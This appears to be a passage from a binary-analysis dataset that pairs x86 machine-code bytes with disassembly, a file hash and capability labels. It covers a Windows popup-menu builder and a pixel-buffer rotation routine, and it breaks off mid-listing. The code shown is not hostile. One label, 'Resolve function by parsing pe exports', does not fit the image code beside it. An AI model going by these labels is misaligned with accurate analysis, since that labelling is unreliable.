6aff6848a44b0064a100000000506489250000000083ec20535556578b7c24448b1783c2188bc2891750e821a9fdff8b1f03d88bc3891f50e813a9fdff8b0f03c88bc1890f8b48048b50088d700ca10079510056894c2428895424208974242c894424308937e8e5a8fdff8b178b6c245883c00483c40c03d08bc2891785ed8944241875158b4c244085c9750783c00489442418c700000000008b1f83c314891f8b5c24488b134a89138b0d0079510041890d007951008b0dcc625000894c244485edc7442438000000000f85920000008b44244085c00f8486000000f644241401747f833b007e548b3783c61856e85ca8fdff03f056e854a8fdff8b54242403f083c4083956047e3383c60c56e83da8fdff8d44060483c404c7000000000083c01489078b134a89138b0d0079510041890d007951008b0385c07fac8d4c2444c7442438ffffffffe8f63507005f5e5d33c05b8b4c242064890d0000000083c42cc385edc744241010000000750ff6442414027408c744241011000000ff151cf54b0085ed8944244875068b4c24188901833b000f8eee0100008b3783c61856e8aaa7fdff03f056e8a2a7fdff8b2c0603f083c60483c4088d4c2444896c242c8b168b460483c6048954242883c6048944241856e8a736070055e800feffff8be883c40485ed7418685c8f4f008d4c2448e8dd380700558d4c2448e8d338070056e849a7fdff8b4c245083c40485c98d6c060475148b44244085c07505894d04eb07c74500000000008b0383c51483f801896c24147e1f8d751856e80fa7fdff03f056e807a7fdff8b4c245483c40803f08b7604eb0383ceff8b4424288b54241c3bc20f8e5801000083feff74233bf07e1f8b5424548b4424505250518b4c2454535751e876fdffff83c418e9e600000083f901740bf6442418010f85c40000008b54244468c8e24f0052e84304050083c40885c075318b4c2454a1007951008bd1f7da1bd223d0f7d91bc95281e100010000508b44245081c1000800005150ff1520f54b00eb7d8a44241833f6a8047405be080000008b4c244c85c97507a802740383ce018b4c24448b15007951008b6c244851525655ff1520f54b008b44245485c07416a10079510081ce000100005050565055ff1524f54b008b74245085f6741d8b6c242c85ed7e15a1007951008bce50e8a69efdff558bcee89e9efdff8b6c2414892f8b0b49890ba10079510040a300795100833b000f8f1afeffff8b7424208b4424488b7c2440568b742414505657ff1520f54b008b44245485c00f848b0000008b4c24248b5c24485181ce0001000053565357ff1524f54b00eb748b44244085c075288d4c2444c7442438ffffffffe8693307008b4424485f5e5d5b8b4c242064890d0000000083c42cc38b4c24208b7c24488b74241051575650ff1520f54b008b44245485c00f8429fdffff8b5424248b4424405281ce0001000057565750ff1524f54b00e90bfdffff8b5c244885ff0f85fffcffff8d4c2444c7442438ffffffffe8f53207008b4c24305f5e8bc35d5b64890d0000000083c42cc3
|
[
"push 0xffffffffffffffff",
"push 0x4ba448",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x20",
"push ebx",
"push ebp",
"push esi",
"push edi",
"mov edi, dword [esp + 0x44]",
"mov edx, dword [edi]",
"add edx, 0x18",
"mov eax, edx",
"mov dword [edi], edx",
"push eax",
"call fcn.00413d00",
"mov ebx, dword [edi]",
"add ebx, eax",
"mov eax, ebx",
"mov dword [edi], ebx",
"push eax",
"call fcn.00413d00",
"mov ecx, dword [edi]",
"add ecx, eax",
"mov eax, ecx",
"mov dword [edi], ecx",
"mov ecx, dword [eax + 4]",
"mov edx, dword [eax + 8]",
"lea esi, [eax + 0xc]",
"mov eax, dword [0x517900]",
"push esi",
"mov dword [esp + 0x28], ecx",
"mov dword [esp + 0x20], edx",
"mov dword [esp + 0x2c], esi",
"mov dword [esp + 0x30], eax",
"mov dword [edi], esi",
"call fcn.00413d00",
"mov edx, dword [edi]",
"mov ebp, dword [esp + 0x58]",
"add eax, 4",
"add esp, 0xc",
"add edx, eax",
"mov eax, edx",
"mov dword [edi], edx",
"test ebp, ebp",
"mov dword [esp + 0x18], eax",
"jne 0x43944a",
"mov ecx, dword [esp + 0x40]",
"test ecx, ecx",
"jne 0x439444",
"add eax, 4",
"mov dword [esp + 0x18], eax",
"mov dword [eax], 0",
"mov ebx, dword [edi]",
"add ebx, 0x14",
"mov dword [edi], ebx",
"mov ebx, dword [esp + 0x48]",
"mov edx, dword [ebx]",
"dec edx",
"mov dword [ebx], edx",
"mov ecx, dword [0x517900]",
"inc ecx",
"mov dword [0x517900], ecx",
"mov ecx, dword [0x5062cc]",
"mov dword [esp + 0x44], ecx",
"test ebp, ebp",
"mov dword [esp + 0x38], 0",
"jne 0x439513",
"mov eax, dword [esp + 0x40]",
"test eax, eax",
"je 0x439513",
"test byte [esp + 0x14], 1",
"je 0x439513",
"cmp dword [ebx], 0",
"jle 0x4394ed",
"mov esi, dword [edi]",
"add esi, 0x18",
"push esi",
"call fcn.00413d00",
"add esi, eax",
"push esi",
"call fcn.00413d00",
"mov edx, dword [esp + 0x24]",
"add esi, eax",
"add esp, 8",
"cmp dword [esi + 4], edx",
"jle 0x4394ed",
"add esi, 0xc",
"push esi",
"call fcn.00413d00",
"lea eax, [esi + eax + 4]",
"add esp, 4",
"mov dword [eax], 0",
"add eax, 0x14",
"mov dword [edi], eax",
"mov edx, dword [ebx]",
"dec edx",
"mov dword [ebx], edx",
"mov ecx, dword [0x517900]",
"inc ecx",
"mov dword [0x517900], ecx",
"mov eax, dword [ebx]",
"test eax, eax",
"jg 0x439499",
"lea ecx, [esp + 0x44]",
"mov dword [esp + 0x38], 0xffffffff",
"call fcn.004acaf4",
"pop edi",
"pop esi",
"pop ebp",
"xor eax, eax",
"pop ebx",
"mov ecx, dword [esp + 0x20]",
"mov dword fs:[0], ecx",
"add esp, 0x2c",
"ret",
"test ebp, ebp",
"mov dword [esp + 0x10], 0x10",
"jne 0x43952e",
"test byte [esp + 0x14], 2",
"je 0x43952e",
"mov dword [esp + 0x10], 0x11",
"call dword [sym.imp.USER32.dll_CreatePopupMenu]",
"test ebp, ebp",
"mov dword [esp + 0x48], eax",
"jne 0x439542",
"mov ecx, dword [esp + 0x18]",
"mov dword [ecx], eax",
"cmp dword [ebx], 0",
"jle 0x439739",
"mov esi, dword [edi]",
"add esi, 0x18",
"push esi",
"call fcn.00413d00",
"add esi, eax",
"push esi",
"call fcn.00413d00",
"mov ebp, dword [esi + eax]",
"add esi, eax",
"add esi, 4",
"add esp, 8",
"lea ecx, [esp + 0x44]",
"mov dword [esp + 0x2c], ebp",
"mov edx, dword [esi]",
"mov eax, dword [esi + 4]",
"add esi, 4",
"mov dword [esp + 0x28], edx",
"add esi, 4",
"mov dword [esp + 0x18], eax",
"push esi",
"call fcn.004acc31",
"push ebp",
"call fcn.00439390",
"mov ebp, eax",
"add esp, 4",
"test ebp, ebp",
"je 0x4395b1",
"push 0x4f8f5c",
"lea ecx, [esp + 0x48]",
"call fcn.004ace84",
"push ebp",
"lea ecx, [esp + 0x48]",
"call fcn.004ace84",
"push esi",
"call fcn.00413d00",
"mov ecx, dword [esp + 0x50]",
"add esp, 4",
"test ecx, ecx",
"lea ebp, [esi + eax + 4]",
"jne 0x4395da",
"mov eax, dword [esp + 0x40]",
"test eax, eax",
"jne 0x4395d3",
"mov dword [ebp + 4], ecx",
"jmp 0x4395da",
"mov dword [ebp], 0",
"mov eax, dword [ebx]",
"add ebp, 0x14",
"cmp eax, 1",
"mov dword [esp + 0x14], ebp",
"jle 0x439607",
"lea esi, [ebp + 0x18]",
"push esi",
"call fcn.00413d00",
"add esi, eax",
"push esi",
"call fcn.00413d00",
"mov ecx, dword [esp + 0x54]",
"add esp, 8",
"add esi, eax",
"mov esi, dword [esi + 4]",
"jmp 0x43960a",
"or esi, 0xffffffff",
"mov eax, dword [esp + 0x28]",
"mov edx, dword [esp + 0x1c]",
"cmp eax, edx",
"jle 0x439772",
"cmp esi, 0xffffffff",
"je 0x439642",
"cmp esi, eax",
"jle 0x439642",
"mov edx, dword [esp + 0x54]",
"mov eax, dword [esp + 0x50]",
"push edx",
"push eax",
"push ecx",
"mov ecx, dword [esp + 0x54]",
"push ebx",
"push edi",
"push ecx",
"call fcn.004393b0",
"add esp, 0x18",
"jmp 0x439728",
"cmp ecx, 1",
"je 0x439652",
"test byte [esp + 0x18], 1",
"jne 0x439716",
"mov edx, dword [esp + 0x44]",
"push 0x4fe2c8",
"push edx",
"call fcn.00489aa4",
"add esp, 8",
"test eax, eax",
"jne 0x439699",
"mov ecx, dword [esp + 0x54]",
"mov eax, dword [0x517900]",
"mov edx, ecx",
"neg edx",
"sbb edx, edx",
"and edx, eax",
"neg ecx",
"sbb ecx, ecx",
"push edx",
"and ecx, 0x100",
"push eax",
"mov eax, dword [esp + 0x50]",
"add ecx, 0x800",
"push ecx",
"push eax",
"call dword [sym.imp.USER32.dll_AppendMenuA]",
"jmp 0x439716",
"mov al, byte [esp + 0x18]",
"xor esi, esi",
"test al, 4",
"je 0x4396a8",
"mov esi, 8",
"mov ecx, dword [esp + 0x4c]",
"test ecx, ecx",
"jne 0x4396b7",
"test al, 2",
"je 0x4396b7",
"or esi, 1",
"mov ecx, dword [esp + 0x44]",
"mov edx, dword [0x517900]",
"mov ebp, dword [esp + 0x48]",
"push ecx",
"push edx",
"push esi",
"push ebp",
"call dword [sym.imp.USER32.dll_AppendMenuA]",
"mov eax, dword [esp + 0x54]",
"test eax, eax",
"je 0x4396ed",
"mov eax, dword [0x517900]",
"or esi, 0x100",
"push eax",
"push eax",
"push esi",
"push eax",
"push ebp",
"call dword [sym.imp.USER32.dll_ModifyMenuA]",
"mov esi, dword [esp + 0x50]",
"test esi, esi",
"je 0x439712",
"mov ebp, dword [esp + 0x2c]",
"test ebp, ebp",
"jle 0x439712",
"mov eax, dword [0x517900]",
"mov ecx, esi",
"push eax",
"call fcn.004135b0",
"push ebp",
"mov ecx, esi",
"call fcn.004135b0",
"mov ebp, dword [esp + 0x14]",
"mov dword [edi], ebp",
"mov ecx, dword [ebx]",
"dec ecx",
"mov dword [ebx], ecx",
"mov eax, dword [0x517900]",
"inc eax",
"mov dword [0x517900], eax",
"cmp dword [ebx], 0",
"jg 0x43954b",
"mov esi, dword [esp + 0x20]",
"mov eax, dword [esp + 0x48]",
"mov edi, dword [esp + 0x40]",
"push esi",
"mov esi, dword [esp + 0x14]",
"push eax",
"push esi",
"push edi",
"call dword [sym.imp.USER32.dll_AppendMenuA]",
"mov eax, dword [esp + 0x54]",
"test eax, eax",
"je 0x4397e2",
"mov ecx, dword [esp + 0x24]",
"mov ebx, dword [esp + 0x48]",
"push ecx",
"or esi, 0x100",
"push ebx",
"push esi",
"push ebx",
"push edi",
"call dword [sym.imp.USER32.dll_ModifyMenuA]",
"jmp 0x4397e6",
"mov eax, dword [esp + 0x40]",
"test eax, eax",
"jne 0x4397a2",
"lea ecx, [esp + 0x44]",
"mov dword [esp + 0x38], 0xffffffff",
"call fcn.004acaf4",
"mov eax, dword [esp + 0x48]",
"pop edi",
"pop esi",
"pop ebp",
"pop ebx",
"mov ecx, dword [esp + 0x20]",
"mov dword fs:[0], ecx",
"add esp, 0x2c",
"ret",
"mov ecx, dword [esp + 0x20]",
"mov edi, dword [esp + 0x48]",
"mov esi, dword [esp + 0x10]",
"push ecx",
"push edi",
"push esi",
"push eax",
"call dword [sym.imp.USER32.dll_AppendMenuA]",
"mov eax, dword [esp + 0x54]",
"test eax, eax",
"je 0x4394ed",
"mov edx, dword [esp + 0x24]",
"mov eax, dword [esp + 0x40]",
"push edx",
"or esi, 0x100",
"push edi",
"push esi",
"push edi",
"push eax",
"call dword [sym.imp.USER32.dll_ModifyMenuA]",
"jmp 0x4394ed",
"mov ebx, dword [esp + 0x48]",
"test edi, edi",
"jne 0x4394ed",
"lea ecx, [esp + 0x44]",
"mov dword [esp + 0x38], 0xffffffff",
"call fcn.004acaf4",
"mov ecx, dword [esp + 0x30]",
"pop edi",
"pop esi",
"mov eax, ebx",
"pop ebp",
"pop ebx",
"mov dword fs:[0], ecx",
"add esp, 0x2c",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x43a510
|
[
"Resolve function by parsing pe exports"
] |
8b44240483ec1083f801535556578bf17c7183f8087f6c837c2434027c65e8ddfbffff8b6c24288b4c242c85ed7f0485c97e508b7c243885ff7454833f007d06c707000000008b470485c07d07c7470400000000396f087e03896f08394f0c7e03894f0c8b6f088b1f8b4f0c8b57042beb2bca85ed896c2410894c24387e0485c97f145f5e5d33c05b83c410c21800896c2410894c24388d04ad000000008d5e58894424140fafc1508bcb8944241ce87c8dfdff85c074cb8b4b108b466885c9750433dbeb038b5b085053e8109103008b44243c83c40889868c0000008d5e78c1e002508bcb89442438e8418dfdff85c074908b4c24288b4424248b54242c894e7089466c8956748b431085c0750433dbeb038b5b088b4424348b4c2430505153e85a90030083c40c8d869000000085ff740a5750ff159cf54b00eb138b56748b4e7052516a006a0050ff15c8f54b008b466885c0750ac744242400000000eb078b5660895424248bbe980000008b4424288b969c0000002bc78bd88b44242c2bc2895c241c894424308b466c4883f8070f87d4040000ff24858cab43008b44243833ff85c0897c24340f8ebb0400008d0cad000000008bc1f7d8894424308b4424388d58ff8b4424240fafd903d88d43028b5674538d48ff51508b86940000005203c78bce50e8b40400008b0385ed7e0a8bcd8bfbf3ab8b7c24348b4c24308b4424384703d93bf8897c24347cc05f5e5db8010000005b83c410c218008b44243833ff85c0897c24340f8e3b0400008b5c24248d43028b5674538d48ff51508b44243c528d0c07518bcee8500400008b0385ed7e0a8bcd8bfbf3ab8b7c24348d04ad000000004703d88b4424383bf8897c24347cbe5f5e5db8010000005b83c410c2180085edc7442434000000000f8ed60300008b5424388d04ad000000008d7aff0faff8037c24248b56708d4702578bdf8d48ff51508b8690000000528b5424448bce03c250e8d30300008b5424388b0f85d27e0e8d04ad00000000890b2bd84a75f28b44243483c704403bc5894424347cb55f5e5db8010000005b83c410c2180085edc7442434000000000f8e570300008b4c24248b5424188d7c0afc8d47028b5670578bdf8d48ff518b4c2424508b44244003c152508bcee85f0300008b4424388b0f85c07e108bd08d04ad00000000890b2bd84a75f28b44243483ef04403bc5894424347cb55f5e5db8010000005b83c410c218008b46708b4e743bc1894424347c04894c2434db442434dcc0e8a1ea04008b9694000000894424348b442438895424308d48ff85c90f8cb70200008b5424148bc2f7d8894424288bc10fafc28b54242403c24189442424894c24388bd88b44241033ff85c08beb7e3783c3028b86900000008b5424348d4bff55518b4c243803c15303c752508bcee89a0200008b4424104783c50483c3043bf87cd08b5c24248b5424288b4c24308b44243803da4148895c2424894c243089442438759f5f5e5db8010000005b83c410c218008b46708b4e743bc1894424347c04894c2434db442434dcc0e8d5e90400894424348b44243885c00f8ef80100008b4c24308b54241403cb89442428894c24388b4c24248d5411fd8954242485ed7e318b5c24388b7c2424896c24308b5424348d47ff508d4f01575152538bcee8e90100008b4424304383ef04488944243075db8b5424248b4c24388d04ad0000000003d08b442428414889542424894c24388944242875a65f5e5db8010000005b83c410c218008b5e708b46743bd8895c24347c0489442434db442434dcc0e821e904008b8e94000000894424348b4424382bdf4885c00f8c3b0100008d14ad000000008bf80faffa03d98bca03fa8b542424f7d98d5417fd40895c2438894c241c895424248944242885ed7e358b5c24388b7c2424896c24308b5424348d47ff508d4f01575152538bcee81d0100008b4424304383ef04488944243075db8b4c241c8b7c24248b5424388b44242803f94248897c2424895424388944242875a95f5e5db8010000005b83c410c218008b46708b4e743bc1894424347c04894c2434db442434dcc0e858e804008b4c2438894424348b869000000085c97e798b542430894c242803c2894424388b442424894424248b4424108b7c242485c08bef7e348b5c243883c702894424308b5424348d4fff55515752538bcee86c0000008b4424304383c50483c704488944243075db8b4424108b5424248b4c2438c1e00203d08b442428414889542424894c243889442428759d5f5e5db8010000005b83c410c21800
|
[
"mov eax, dword [esp + 4]",
"sub esp, 0x10",
"cmp eax, 1",
"push ebx",
"push ebp",
"push esi",
"push edi",
"mov esi, ecx",
"jl 0x43a593",
"cmp eax, 8",
"jg 0x43a593",
"cmp dword [esp + 0x34], 2",
"jl 0x43a593",
"call fcn.0043a110",
"mov ebp, dword [esp + 0x28]",
"mov ecx, dword [esp + 0x2c]",
"test ebp, ebp",
"jg 0x43a543",
"test ecx, ecx",
"jle 0x43a593",
"mov edi, dword [esp + 0x38]",
"test edi, edi",
"je 0x43a59f",
"cmp dword [edi], 0",
"jge 0x43a556",
"mov dword [edi], 0",
"mov eax, dword [edi + 4]",
"test eax, eax",
"jge 0x43a564",
"mov dword [edi + 4], 0",
"cmp dword [edi + 8], ebp",
"jle 0x43a56c",
"mov dword [edi + 8], ebp",
"cmp dword [edi + 0xc], ecx",
"jle 0x43a574",
"mov dword [edi + 0xc], ecx",
"mov ebp, dword [edi + 8]",
"mov ebx, dword [edi]",
"mov ecx, dword [edi + 0xc]",
"mov edx, dword [edi + 4]",
"sub ebp, ebx",
"sub ecx, edx",
"test ebp, ebp",
"mov dword [esp + 0x10], ebp",
"mov dword [esp + 0x38], ecx",
"jle 0x43a593",
"test ecx, ecx",
"jg 0x43a5a7",
"pop edi",
"pop esi",
"pop ebp",
"xor eax, eax",
"pop ebx",
"add esp, 0x10",
"ret 0x18",
"mov dword [esp + 0x10], ebp",
"mov dword [esp + 0x38], ecx",
"lea eax, [ebp*4]",
"lea ebx, [esi + 0x58]",
"mov dword [esp + 0x14], eax",
"imul eax, ecx",
"push eax",
"mov ecx, ebx",
"mov dword [esp + 0x1c], eax",
"call fcn.00413340",
"test eax, eax",
"je 0x43a593",
"mov ecx, dword [ebx + 0x10]",
"mov eax, dword [esi + 0x68]",
"test ecx, ecx",
"jne 0x43a5d6",
"xor ebx, ebx",
"jmp 0x43a5d9",
"mov ebx, dword [ebx + 8]",
"push eax",
"push ebx",
"call fcn.004736f0",
"mov eax, dword [esp + 0x3c]",
"add esp, 8",
"mov dword [esi + 0x8c], eax",
"lea ebx, [esi + 0x78]",
"shl eax, 2",
"push eax",
"mov ecx, ebx",
"mov dword [esp + 0x38], eax",
"call fcn.00413340",
"test eax, eax",
"je 0x43a593",
"mov ecx, dword [esp + 0x28]",
"mov eax, dword [esp + 0x24]",
"mov edx, dword [esp + 0x2c]",
"mov dword [esi + 0x70], ecx",
"mov dword [esi + 0x6c], eax",
"mov dword [esi + 0x74], edx",
"mov eax, dword [ebx + 0x10]",
"test eax, eax",
"jne 0x43a623",
"xor ebx, ebx",
"jmp 0x43a626",
"mov ebx, dword [ebx + 8]",
"mov eax, dword [esp + 0x34]",
"mov ecx, dword [esp + 0x30]",
"push eax",
"push ecx",
"push ebx",
"call fcn.00473690",
"add esp, 0xc",
"lea eax, [esi + 0x90]",
"test edi, edi",
"je 0x43a64d",
"push edi",
"push eax",
"call dword [sym.imp.USER32.dll_CopyRect]",
"jmp 0x43a660",
"mov edx, dword [esi + 0x74]",
"mov ecx, dword [esi + 0x70]",
"push edx",
"push ecx",
"push 0",
"push 0",
"push eax",
"call dword [sym.imp.USER32.dll_SetRect]",
"mov eax, dword [esi + 0x68]",
"test eax, eax",
"jne 0x43a671",
"mov dword [esp + 0x24], 0",
"jmp 0x43a678",
"mov edx, dword [esi + 0x60]",
"mov dword [esp + 0x24], edx",
"mov edi, dword [esi + 0x98]",
"mov eax, dword [esp + 0x28]",
"mov edx, dword [esi + 0x9c]",
"sub eax, edi",
"mov ebx, eax",
"mov eax, dword [esp + 0x2c]",
"sub eax, edx",
"mov dword [esp + 0x1c], ebx",
"mov dword [esp + 0x30], eax",
"mov eax, dword [esi + 0x6c]",
"dec eax",
"cmp eax, 7",
"ja case.default.0x43a6a7",
"jmp dword [eax*4 + 0x43ab8c]",
"mov eax, dword [esp + 0x38]",
"xor edi, edi",
"test eax, eax",
"mov dword [esp + 0x34], edi",
"jle case.default.0x43a6a7",
"lea ecx, [ebp*4]",
"mov eax, ecx",
"neg eax",
"mov dword [esp + 0x30], eax",
"mov eax, dword [esp + 0x38]",
"lea ebx, [eax - 1]",
"mov eax, dword [esp + 0x24]",
"imul ebx, ecx",
"add ebx, eax",
"lea eax, [ebx + 2]",
"mov edx, dword [esi + 0x74]",
"push ebx",
"lea ecx, [eax - 1]",
"push ecx",
"push eax",
"mov eax, dword [esi + 0x94]",
"push edx",
"add eax, edi",
"mov ecx, esi",
"push eax",
"call fcn.0043abb0",
"mov eax, dword [ebx]",
"test ebp, ebp",
"jle 0x43a70c",
"mov ecx, ebp",
"mov edi, ebx",
"rep stosd dword es:[edi], eax",
"mov edi, dword [esp + 0x34]",
"mov ecx, dword [esp + 0x30]",
"mov eax, dword [esp + 0x38]",
"inc edi",
"add ebx, ecx",
"cmp edi, eax",
"mov dword [esp + 0x34], edi",
"jl 0x43a6df",
"pop edi",
"pop esi",
"pop ebp",
"mov eax, 1",
"pop ebx",
"add esp, 0x10",
"ret 0x18",
"mov eax, dword [esp + 0x38]",
"xor edi, edi",
"test eax, eax",
"mov dword [esp + 0x34], edi",
"jle case.default.0x43a6a7",
"mov ebx, dword [esp + 0x24]",
"lea eax, [ebx + 2]",
"mov edx, dword [esi + 0x74]",
"push ebx",
"lea ecx, [eax - 1]",
"push ecx",
"push eax",
"mov eax, dword [esp + 0x3c]",
"push edx",
"lea ecx, [edi + eax]",
"push ecx",
"mov ecx, esi",
"call fcn.0043abb0",
"mov eax, dword [ebx]",
"test ebp, ebp",
"jle 0x43a770",
"mov ecx, ebp",
"mov edi, ebx",
"rep stosd dword es:[edi], eax",
"mov edi, dword [esp + 0x34]",
"lea eax, [ebp*4]",
"inc edi",
"add ebx, eax",
"mov eax, dword [esp + 0x38]",
"cmp edi, eax",
"mov dword [esp + 0x34], edi",
"jl 0x43a744",
"pop edi",
"pop esi",
"pop ebp",
"mov eax, 1",
"pop ebx",
"add esp, 0x10",
"ret 0x18",
"test ebp, ebp",
"mov dword [esp + 0x34], 0",
"jle case.default.0x43a6a7",
"mov edx, dword [esp + 0x38]",
"lea eax, [ebp*4]",
"lea edi, [edx - 1]",
"imul edi, eax",
"add edi, dword [esp + 0x24]",
"mov edx, dword [esi + 0x70]",
"lea eax, [edi + 2]",
"push edi",
"mov ebx, edi",
"lea ecx, [eax - 1]",
"push ecx",
"push eax",
"mov eax, dword [esi + 0x90]",
"push edx",
"mov edx, dword [esp + 0x44]",
"mov ecx, esi",
"add eax, edx",
"push eax",
"call fcn.0043abb0",
"mov edx, dword [esp + 0x38]",
"mov ecx, dword [edi]",
"test edx, edx",
"jle 0x43a7f5",
"lea eax, [ebp*4]",
"mov dword [ebx], ecx",
"sub ebx, eax",
"dec edx",
"jne 0x43a7e7",
"mov eax, dword [esp + 0x34]",
"add edi, 4",
"inc eax",
"cmp eax, ebp",
"mov dword [esp + 0x34], eax",
"jl 0x43a7ba",
"pop edi",
"pop esi",
"pop ebp",
"mov eax, 1",
"pop ebx",
"add esp, 0x10",
"ret 0x18",
"test ebp, ebp",
"mov dword [esp + 0x34], 0",
"jle case.default.0x43a6a7",
"mov ecx, dword [esp + 0x24]",
"mov edx, dword [esp + 0x18]",
"lea edi, [edx + ecx - 4]",
"lea eax, [edi + 2]",
"mov edx, dword [esi + 0x70]",
"push edi",
"mov ebx, edi",
"lea ecx, [eax - 1]",
"push ecx",
"mov ecx, dword [esp + 0x24]",
"push eax",
"mov eax, dword [esp + 0x40]",
"add eax, ecx",
"push edx",
"push eax",
"mov ecx, esi",
"call fcn.0043abb0",
"mov eax, dword [esp + 0x38]",
"mov ecx, dword [edi]",
"test eax, eax",
"jle 0x43a86b",
"mov edx, eax",
"lea eax, [ebp*4]",
"mov dword [ebx], ecx",
"sub ebx, eax",
"dec edx",
"jne 0x43a85d",
"mov eax, dword [esp + 0x34]",
"sub edi, 4",
"inc eax",
"cmp eax, ebp",
"mov dword [esp + 0x34], eax",
"jl 0x43a830",
"pop edi",
"pop esi",
"pop ebp",
"mov eax, 1",
"pop ebx",
"add esp, 0x10",
"ret 0x18",
"mov eax, dword [esi + 0x70]",
"mov ecx, dword [esi + 0x74]",
"cmp eax, ecx",
"mov dword [esp + 0x34], eax",
"jl 0x43a89c",
"mov dword [esp + 0x34], ecx",
"fild dword [esp + 0x34]",
"fadd st(0), st(0)",
"call fcn.00489348",
"mov edx, dword [esi + 0x94]",
"mov dword [esp + 0x34], eax",
"mov eax, dword [esp + 0x38]",
"mov dword [esp + 0x30], edx",
"lea ecx, [eax - 1]",
"test ecx, ecx",
"jl case.default.0x43a6a7",
"mov edx, dword [esp + 0x14]",
"mov eax, edx",
"neg eax",
"mov dword [esp + 0x28], eax",
"mov eax, ecx",
"imul eax, edx",
"mov edx, dword [esp + 0x24]",
"add eax, edx",
"inc ecx",
"mov dword [esp + 0x24], eax",
"mov dword [esp + 0x38], ecx",
"mov ebx, eax",
"mov eax, dword [esp + 0x10]",
"xor edi, edi",
"test eax, eax",
"mov ebp, ebx",
"jle 0x43a929",
"add ebx, 2",
"mov eax, dword [esi + 0x90]",
"mov edx, dword [esp + 0x34]",
"lea ecx, [ebx - 1]",
"push ebp",
"push ecx",
"mov ecx, dword [esp + 0x38]",
"add eax, ecx",
"push ebx",
"add eax, edi",
"push edx",
"push eax",
"mov ecx, esi",
"call fcn.0043abb0",
"mov eax, dword [esp + 0x10]",
"inc edi",
"add ebp, 4",
"add ebx, 4",
"cmp edi, eax",
"jl 0x43a8f5",
"mov ebx, dword [esp + 0x24]",
"mov edx, dword [esp + 0x28]",
"mov ecx, dword [esp + 0x30]",
"mov eax, dword [esp + 0x38]",
"add ebx, edx",
"inc ecx",
"dec eax",
"mov dword [esp + 0x24], ebx",
"mov dword [esp + 0x30], ecx",
"mov dword [esp + 0x38], eax",
"jne 0x43a8e6",
"pop edi",
"pop esi",
"pop ebp",
"mov eax, 1",
"pop ebx",
"add esp, 0x10",
"ret 0x18",
"mov eax, dword [esi + 0x70]",
"mov ecx, dword [esi + 0x74]",
"cmp eax, ecx",
"mov dword [esp + 0x34], eax",
"jl 0x43a968",
"mov dword [esp + 0x34], ecx",
"fild dword [esp + 0x34]",
"fadd st(0), st(0)",
"call fcn.00489348",
"mov dword [esp + 0x34], eax",
"mov eax, dword [esp + 0x38]",
"test eax, eax",
"jle case.default.0x43a6a7",
"mov ecx, dword [esp + 0x30]",
"mov edx, dword [esp + 0x14]",
"add ecx, ebx",
"mov dword [esp + 0x28], eax",
"mov dword [esp + 0x38], ecx",
"mov ecx, dword [esp + 0x24]",
"lea edx, [ecx + edx - 3]",
"mov dword [esp + 0x24], edx",
"test ebp, ebp",
"jle 0x43a9d6",
"mov ebx, dword [esp + 0x38]",
"mov edi, dword [esp + 0x24]",
"mov dword [esp + 0x30], ebp",
"mov edx, dword [esp + 0x34]",
"lea eax, [edi - 1]",
"push eax",
"lea ecx, [edi + 1]",
"push edi",
"push ecx",
"push edx",
"push ebx",
"mov ecx, esi",
"call fcn.0043abb0",
"mov eax, dword [esp + 0x30]",
"inc ebx",
"sub edi, 4",
"dec eax",
"mov dword [esp + 0x30], eax",
"jne 0x43a9b1",
"mov edx, dword [esp + 0x24]",
"mov ecx, dword [esp + 0x38]",
"lea eax, [ebp*4]",
"add edx, eax",
"mov eax, dword [esp + 0x28]",
"inc ecx",
"dec eax",
"mov dword [esp + 0x24], edx",
"mov dword [esp + 0x38], ecx",
"mov dword [esp + 0x28], eax",
"jne 0x43a9a1",
"pop edi",
"pop esi",
"pop ebp",
"mov eax, 1",
"pop ebx",
"add esp, 0x10",
"ret 0x18",
"mov ebx, dword [esi + 0x70]",
"mov eax, dword [esi + 0x74]",
"cmp ebx, eax",
"mov dword [esp + 0x34], ebx",
"jl 0x43aa1c",
"mov dword [esp + 0x34], eax",
"fild dword [esp + 0x34]",
"fadd st(0), st(0)",
"call fcn.00489348",
"mov ecx, dword [esi + 0x94]",
"mov dword [esp + 0x34], eax",
"mov eax, dword [esp + 0x38]",
"sub ebx, edi",
"dec eax",
"test eax, eax",
"jl case.default.0x43a6a7",
"lea edx, [ebp*4]",
"mov edi, eax",
"imul edi, edx",
"add ebx, ecx",
"mov ecx, edx",
"add edi, edx",
"mov edx, dword [esp + 0x24]",
"neg ecx",
"lea edx, [edi + edx - 3]",
"inc eax",
"mov dword [esp + 0x38], ebx",
"mov dword [esp + 0x1c], ecx",
"mov dword [esp + 0x24], edx",
"mov dword [esp + 0x28], eax",
"test ebp, ebp",
"jle 0x43aaa6",
"mov ebx, dword [esp + 0x38]",
"mov edi, dword [esp + 0x24]",
"mov dword [esp + 0x30], ebp",
"mov edx, dword [esp + 0x34]",
"lea eax, [edi - 1]",
"push eax",
"lea ecx, [edi + 1]",
"push edi",
"push ecx",
"push edx",
"push ebx",
"mov ecx, esi",
"call fcn.0043abb0",
"mov eax, dword [esp + 0x30]",
"inc ebx",
"sub edi, 4",
"dec eax",
"mov dword [esp + 0x30], eax",
"jne 0x43aa7d",
"mov ecx, dword [esp + 0x1c]",
"mov edi, dword [esp + 0x24]",
"mov edx, dword [esp + 0x38]",
"mov eax, dword [esp + 0x28]",
"add edi, ecx",
"inc edx",
"dec eax",
"mov dword [esp + 0x24], edi",
"mov dword [esp + 0x38], edx",
"mov dword [esp + 0x28], eax",
"jne 0x43aa6d",
"pop edi",
"pop esi",
"pop ebp",
"mov eax, 1",
"pop ebx",
"add esp, 0x10",
"ret 0x18",
"mov eax, dword [esi + 0x70]",
"mov ecx, dword [esi + 0x74]",
"cmp eax, ecx",
"mov dword [esp + 0x34], eax",
"jl 0x43aae5",
"mov dword [esp + 0x34], ecx",
"fild dword [esp + 0x34]",
"fadd st(0), st(0)",
"call fcn.00489348",
"mov ecx, dword [esp + 0x38]",
"mov dword [esp + 0x34], eax",
"mov eax, dword [esi + 0x90]",
"test ecx, ecx",
"jle case.default.0x43a6a7",
"mov edx, dword [esp + 0x30]",
"mov dword [esp + 0x28], ecx",
"add eax, edx",
"mov dword [esp + 0x38], eax",
"mov eax, dword [esp + 0x24]",
"mov dword [esp + 0x24], eax",
"mov eax, dword [esp + 0x10]",
"mov edi, dword [esp + 0x24]",
"test eax, eax",
"mov ebp, edi",
"jle 0x43ab5a",
"mov ebx, dword [esp + 0x38]",
"add edi, 2",
